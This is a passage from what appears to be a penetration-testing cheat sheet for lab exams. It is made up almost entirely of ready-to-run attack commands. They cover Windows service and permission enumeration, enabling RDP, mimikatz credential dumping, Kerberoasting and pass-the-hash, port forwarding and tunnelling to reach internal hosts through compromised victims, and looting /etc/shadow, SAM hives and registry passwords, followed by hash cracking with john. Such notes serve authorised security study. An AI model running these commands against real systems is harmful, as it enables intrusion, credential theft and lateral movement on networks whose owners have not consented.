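        print(f["name"], "->", f["path"])
        print("  quoted form:", f["fix"])
        for p in f["prefixes"]:
            print("  check ACL on parent of:", p)
```

Manual-start services are skipped by default because that is what the findstr /i "Auto" filter does; pass auto_only=False to review every service.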
Processes running - tasklist /SVC
Regular jobs running:
schtasks /query /fo LIST /v
schtasks /query /fo LIST 2>nul | findstr TaskName
Check for Exploitable Services - using an old version of accesschk.exe to circumvent the GUI prompt when running it:
.\accesschk.exe /accepteula -uwcqv "Authenticated Users" *
.\accesschk.exe /accepteula -ucqv <service name identified from first command>
What's installed:
wmic product get name, version, vendor
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}
driverquery.exe /fo table
Where can we write things:
accesschk.exe -uws "Everyone" "C:\Program Files"
powershell Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
Enumerating Active Directory: net user and PowerShell
Enable RDP:
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
Has Windows Auto-login Password been set? reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
Active Directory Authentication Attacks: mimikatz.exe privilege::debug token::elevate sekurlsa::logonpasswords sekurlsa::tickets kerberos::list /export, klist, Invoke-Kerberoast.ps1, GetUserSPNs.ps1, Spray-Passwords.ps1, Pass the Hash, Overpass the Hash, Pass the Ticket, Generating Golden Tickets, Domain Controller Synchronisation
Port Forwarding and Tunneling
General Port Forwarding (Linux):
internet-connected victim facilitating attacker machine connecting to non-internet-connected victim - in /etc/rinetd.conf:
<internet-connected victim> 80 <non-internet-connected victim> 80
sudo service rinetd restart
ss -antp | grep "80"
so all traffic sent on port 80 to the internet-connected victim will be sent to the non-internet-connected victim.
General Remote Port Forwarding (Windows):
internet-connected victim facilitating attacker machine connecting to non-internet-connected victim - from our reverse shell, so running on the internet-connected victim to access a port not available through the firewall:
cmd.exe /c echo y | plink.exe -ssh -l kali -pw ilak -R <attacker>:1234:<internet-connected victim>:3306 <attacker>
we can now scan a port that was previously unviable to us:
sudo nmap -sT -sV 127.0.0.1 -p 1234
General Local Port Forwarding (Windows):
internet-connected victim facilitating attacker machine connecting to non-internet-connected victim - on the internet-connected victim:
plink.exe -N -L <internet-connected victim machine>:4444:<attacker machine>:443 kali@<attacker machine>
on the attacker machine: make sure you set PermitRootLogin to yes in /etc/ssh/sshd_config on your attacker machine first, and restart the SSH service with sudo service ssh restart, then connect on your attacker machine to 127.0.0.1:443
SSH Local Port Forwarding:
sudo ssh -N -L <attacker IP>:445:<non-internet-connected victim IP>:445 <victim user>@<internet-connected victim>
if you're doing SMB make sure /etc/samba/smb.conf on your attacker machine has min protocol = SMB2 in it.
If for some reason, an exploit cannot run locally on the target machine, the port can be forwarded using SSH to your local machine:
ssh -R <local port>:127.0.0.1:<target port> <username>@<local machine>
SSH Remote Port Forwarding:
internet-connected victim facilitating attacker machine connecting to port on internet-connected victim that isn't allowed through the firewall - run on internet-connected Linux victim:
ssh -N -R <attacker machine>:2221:127.0.0.1:3306 <attacker user>@<attacker machine>
now we can scan the originally unavailable port:
sudo nmap -sS -sV 127.0.0.1 -p 2221
SSH + SOCKS4 Dynamic Port Forwarding:
internet-connected victim facilitating attacker machine connecting to non-internet-connected victims - run on attacker machine:
sudo ssh -N -D 127.0.0.1:8080 <victim user>@<internet-connected victim>
configure SOCKS4 proxy in /etc/proxychains.conf: socks4 127.0.0.1 8080, and now run tools through it:
sudo proxychains nmap --top-ports=20 -sT -Pn <non-internet-connected victim>
Netsh Port Forwarding (Old Windows):
set up internet-connected victim to facilitate connection to a non-internet-connected victim
netsh interface portproxy add v4tov4 listenport=4455 listenaddress=<internet-connected victim> connectport=445 connectaddress=<non-internet-connected victim>
allow this kind of traffic to traverse internal firewall:
netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=<internet-connected victim> localport=4455 action=allow
connect to non-internet-connected victim from attacker by connecting to relevant port on internet-connected victim:
smbclient -L <internet-connected victim> --port=4455 --user=Administrator
Collect Evidence
Linux
cat proof.txt
cat local.txt
ifconfig
ip a
Home Directories: ls -lahR /home/
Connections to other machines / internal networks:
netstat -antulp
/sbin/route
ufw status numbered
Search for File Names:
find / -type f -name '*cred*'
find / -type f -name '*password*'
find / -type f -name '*key*'
find / -type f -name "*ssh*"
Secrets about other machines / internal networks: find / -type f -name '*secret*'
Search for File Contents: grep -Ri password - don't do this at /
Find things owned by a specific user or group:
find / -group <group name>
find / -user <user name>
Any databases running here we want to get info out of?
dpkg -l | grep database
mysql -u<db user> -p<db user password> -e 'show databases;'
Investigate scheduled jobs for more interesting info: for dir in $( ls /etc/ | grep cron); do ls -al /etc/$dir; done
/etc/passwd
/etc/shadow
Password Attacks: crackstation
hashid <hash>
unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
Windows
type proof.txt
type local.txt
ipconfig
type network-secret.txt
Get Searchable Lists of all the Folders and Files:
tree c:\ > folders.txt
dir /s c:\ > files.txt
Search for File Names:
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
gci -recurse -filter "proof.txt" -File
gci -recurse -filter "*proof*" -File
Search for File Contents:
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*
Connections to other machines / internal networks: netstat -ano
Home Directories: C:\Users\
Kerberos: krbtgt, klist
Password Attacks: crackstation
hashid <hash>
mimikatz.exe privilege::debug token::elevate
sekurlsa::logonpasswords, lsadump::sam, sekurlsa::tickets
kerberos::list
pth-winexe -U <victim user>%<LM hash>:<NTLM hash> //<victim IP> cmd
sudo john hash.txt --format=NT
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=NT
Older Operating System Password Attacks:
pwdump
fgdump
wce
# on the victim machine
reg save HKLM\SAM c:\SAM
reg save HKLM\System c:\System
reg save HKLM\Security c:\Security
# transfer to attacker machine then run
samdump2 -o output.txt System SAM
# or also
secretsdump.py -sam SAM -security Security -system System
Looting for Passwords in Windows:
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
Searching the Registry for Passwords:
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K